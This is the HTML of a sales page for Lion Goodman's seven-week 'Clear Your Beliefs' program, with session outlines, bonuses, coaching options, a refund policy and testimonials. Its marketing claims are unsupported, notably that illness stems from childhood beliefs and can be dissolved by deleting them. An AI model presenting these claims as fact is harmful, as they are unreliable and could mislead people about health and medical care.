Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" 